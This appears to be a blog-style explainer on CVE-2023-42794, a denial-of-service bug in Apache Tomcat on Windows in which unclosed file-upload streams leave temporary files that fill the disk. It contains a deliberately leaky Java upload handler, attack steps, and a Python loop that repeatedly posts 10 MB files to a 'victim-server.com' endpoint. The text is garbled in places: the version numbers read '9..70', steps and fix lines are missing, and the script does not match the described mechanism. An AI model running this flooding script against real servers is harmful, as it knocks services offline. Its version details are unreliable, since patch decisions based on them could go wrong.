CVE-2023-42794 - Denial of Service in Apache Tomcat from Incomplete Cleanup Vulnerability

---

Apache Tomcat is one of the most popular open-source web servers used for deploying Java applications. In late 2023, a significant vulnerability was discovered—tracked as CVE-2023-42794—that could allow attackers or buggy apps to fill up a server’s disk space, causing a denial of service. This issue affects Apache Tomcat versions 9..70 to 9..80 and 8.5.85 to 8.5.93 running on Windows.

If you’re running Tomcat or manage Java-based web applications, it’s crucial to understand this bug, how it works, its risk, and how to fix it.

The Core Problem

The vulnerability is rooted in the internal version of Commons FileUpload that comes with Tomcat. Between certain versions, Tomcat included an unreleased, in-progress refactoring of Commons FileUpload. This new code did not fully clean up temporary files in a specific edge case:

If an application opened a stream to an uploaded file but did not close it, the file would never be deleted from disk. Over time, leftover files can fill up your disk, eventually causing the entire server to break down—classic denial of service.

The flaw is particularly bad on Windows because of how that operating system manages open file handles and deletions.

A Simple Exploit Scenario

Imagine you have an app that accepts file uploads—a normal pattern in web development. It processes files by opening the uploaded file stream, but due to developer oversight, sometimes it forgets to close those streams:

// BAD CODE - do not copy!
void uploadFile(HttpServletRequest request) throws ServletException, IOException {
    FileItemIterator iter = new ServletFileUpload().getItemIterator(request);
    while (iter.hasNext()) {
        FileItemStream item = iter.next();
        if (!item.isFormField()) {
            InputStream input = item.openStream();
            // process the stream...
            // forgot to call input.close();
        }
    }
}

Because input.close() is never called, the underlying file is never freed—and Tomcat doesn’t clean it up for you in these affected versions. If this runs in a busy app or is abused (especially by a malicious user calling multiple uploads), many files pile up on disk and never leave.

Find a file upload endpoint on the target Tomcat server.

2. Send repeated uploads of large files, while making sure the HTTP requests or uploaded files never get fully read or properly closed (even just aborting the connection can do this).

Below is a simple Python request loop to upload files to a vulnerable Tomcat server repeatedly

import requests

url = "http://victim-server.com/app/upload";
files = {'file': ('junk.txt', 'A' * 10 * 1024 * 1024)}  # 10 MB file

for i in range(100):
    response = requests.post(url, files=files)
    print(f"Upload {i}: {response.status_code}")

Warning: This is for educational use, in a safe, controlled test environment only.

If the server's application doesn't close the upload stream, these files will *accumulate on disk*.

If using 8.5.x, update to 8.5.94 or later.

- Link: Tomcat Security Advisory for CVE-2023-42794
- CVE Details

try (InputStream input = item.openStream()) {

// process file
}
// input is auto-closed here

Review any custom file upload handling.

- Monitor your temp directories (TEMP, /tmp, etc.) for runaway files.

References

- Apache Tomcat Security Advisory (CVE-2023-42794)
- NVD Entry for CVE-2023-42794
- Commons FileUpload Documentation
- Tomcat Release Notes, 9..81

Timeline

Published on: 10/10/2023 18:15:18 UTC
Last modified on: 10/16/2023 14:00:56 UTC